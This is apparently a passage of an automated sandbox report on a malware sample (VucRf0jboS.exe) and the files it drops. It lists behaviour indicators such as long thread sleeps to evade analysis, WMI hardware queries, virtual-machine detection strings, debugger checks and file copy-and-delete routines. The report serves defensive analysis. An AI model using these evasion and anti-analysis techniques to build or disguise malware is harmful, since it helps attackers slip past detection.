                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -52827s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -56855s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -50306s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -44732s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -55461s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -46456s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -39034s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -59859s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -43059s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -35184s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -47540s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -37220s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -31309s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -38045s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -57926s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -48925s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -57254s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -43307s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -43560s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7600Thread sleep time: -31476s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 7696Thread sleep time: -26747778906878833s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 2136Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6072Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe TID: 4088Thread sleep count: 50 > 30
                              Source: C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe TID: 4088Thread sleep time: -35550s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00412570
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040D1C0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004015C0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_00411650
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_0040B610
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0040DB60
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00411B80
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040D540
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_004121F0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_6C8F261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,3_2_6C8F261E
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_00401120 GetSystemInfo,ExitProcess,1_2_00401120
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 60000
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 47031
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33082
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 52718
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 30302
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55327
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38215
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 48172
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54678
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 46407
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 42194
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59377
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 43252
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 52827
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56855
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 50306
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 44732
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55461
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 46456
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39034
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59859
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 43059
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35184
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 47540
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37220
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 31309
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38045
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 57926
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 48925
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 57254
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 43307
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 43560
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 31476
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile opened: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile opened: C:\Users\user\AppData\Local\Temp\u5qk.2Jump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: Microsoft Hyper-V Server
                              Source: u5qk.3.exe, 00000009.00000003.2494932914.0000000000BBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3048417382.0000020EEF9FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                              Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: Datacenter without Hyper-V Core
                              Source: cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80394000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ) Core(TM)2 CPU 6600 @ 2.40 GHz\",\r\n \"CurrentClockSpeed\": 2000,\r\n \"NumberOfCores\": 4\r\n },\r\n {\r\n \"Name\": \"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\",\r\n \"CurrentClockSpeed\": 2000,\r\n \"NumberOfCores\": 4\r\n }\r\n]","OS_Name":"Microsoft Windows 10 Pro","GPUs":"[\r\n {\r\n \"Caption\": \"HF6TYZRRO\",\r\n \"VideoProcessor\": \"MKELR1FK\",\r\n \"VideoArchitecture\": 5,\r\n \"AdapterRAM\": 1073741824,\r\n \"VideoMode\": \"1280 x 1024 x 4294967296 colors\",\r\n \"RefreshRate\": 1\r\n }\r\n]"},"measurements":{"Installed":1}}}}3332","OS_Language":"en-GB","IsActiveCare":"False","InstallType":"Install","Result":"Success","ProductId":"5488cb36-be62-4606-b07b-2ee938868bd1","OS_Version":"10.0.19045","OS_BuildNumber":"19045","EcommId":"11a12794-499e-4fa0-a281-a9a9aa8b2685","Disks":"[\r\n {\r\n \"Caption\": \"VMware Virtual disk\",\r\n \"Size\": 53687091200,\r\n \"MediaType\": 4,\r\n \"BusType\": 10\r\n }\r\n]","CPUs":"[\r\n {\r\n \"Name\": \"Intel(Rh
                              Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: QEMU_HARDU
                              Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: Standard without Hyper-V Full
                              Source: cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                              Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: Enterprise without Hyper-V Core
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3048417382.0000020EEF9FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSFT_PhysicalDisk{1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\SPACES_PhysicalDisk.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PD:{fadc7a83-6534-864a-66c8-a75a642cb79f}"6000C2942FCE4D06663969F532E45D1AVMware Virtual diskVMwareVirtual disk6000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
                              Source: u5qk.0.exe, 00000001.00000002.2493025545.00000000040C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                              Source: cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                              Source: cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                              Source: u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: VMWARE_VIRTUAL
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3048417382.0000020EEF9FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk
                              Source: u5qk.0.exe, 00000001.00000002.2493025545.000000000406A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "Caption": "VMware Virtual disk",
                              Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: 6without Hyper-V for Windows Essential Server Solutions
                              Source: cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                              Source: u5qk.0.exe, 00000001.00000002.2493025545.00000000040C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,"R
                              Source: u5qk.0.exe, 00000001.00000002.2493025545.000000000406A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                              Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: Standard without Hyper-V Core
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3048417382.0000020EEF9B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
                              Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: Datacenter without Hyper-V Full
                              Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80394000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ) Core(TM)2 CPU 6600 @ 2.40 GHz\",\r\n \"CurrentClockSpeed\": 2000,\r\n \"NumberOfCores\": 4\r\n },\r\n {\r\n \"Name\": \"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\",\r\n \"CurrentClockSpeed\": 2000,\r\n \"NumberOfCores\": 4\r\n }\r\n]","OS_Name":"Microsoft Windows 10 Pro","GPUs":"[\r\n {\r\n \"Caption\": \"HF6TYZRRO\",\r\n \"VideoProcessor\": \"MKELR1FK\",\r\n \"VideoArchitecture\": 5,\r\n \"AdapterRAM\": 1073741824,\r\n \"VideoMode\": \"1280 x 1024 x 4294967296 colors\",\r\n \"RefreshRate\": 1\r\n }\r\n]"},"measurements":{"Installed":1}}}}3332","OS_Language":"en-GB","IsActiveCare":"False","InstallType":"Install","Result":"Success","ProductId":"5488cb36-be62-4606-b07b-2ee938868bd1","OS_Version":"10.0.19045","OS_BuildNumber":"19045","EcommId":"11a12794-499e-4fa0-a281-a9a9aa8b2685","Disks":"[\r\n {\r\n \"Caption\": \"VMware Virtual disk\",\r\n \"Size\": 53687091200,\r\n \"MediaType\": 4,\r\n \"BusType\": 10\r\n }\r\n]","CPUs":"[\r\n {\r\n \"Name\": \"Intel(R
                              Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: Enterprise without Hyper-V Full
                              Source: MSBuild.exe, 0000000D.00000002.2976557348.0000000000870000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvv
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeAPI call chain: ExitProcess graph end nodegraph_1-80955
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeAPI call chain: ExitProcess graph end nodegraph_1-80776
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeAPI call chain: ExitProcess graph end nodegraph_1-80936
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeAPI call chain: ExitProcess graph end nodegraph_1-80933
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeAPI call chain: ExitProcess graph end nodegraph_1-80947
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeAPI call chain: ExitProcess graph end nodegraph_1-81969
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeAPI call chain: ExitProcess graph end nodegraph_1-80954
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeAPI call chain: ExitProcess graph end nodegraph_1-80977
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeAPI call chain: ExitProcess graph end node
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00409A73
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00CFD15B VirtualProtect ?,-00000001,00000104,?,?,?,000000003_2_00CFD15B
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00416240
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_004139E7 mov eax, dword ptr fs:[00000030h]0_2_004139E7
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_04153C4E mov eax, dword ptr fs:[00000030h]0_2_04153C4E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_04140D90 mov eax, dword ptr fs:[00000030h]0_2_04140D90
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0414092B mov eax, dword ptr fs:[00000030h]0_2_0414092B
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_041E54B3 push dword ptr fs:[00000030h]0_2_041E54B3
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_00415DC0 mov eax, dword ptr fs:[00000030h]1_2_00415DC0
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_00420AEA GetProcessHeap,0_2_00420AEA
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00409A73
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_00409C06 SetUnhandledExceptionFilter,0_2_00409C06
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00409EBE
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041073B
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_04149CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04149CDA
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_04149E6D SetUnhandledExceptionFilter,0_2_04149E6D
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0414A125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0414A125
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_041509A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_041509A2
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_00419DC7 SetUnhandledExceptionFilter,1_2_00419DC7
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00417B4E
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004173DD
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA8B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6BA8B1F7
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA8B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_6BA8B66C
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BC3AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6BC3AC62
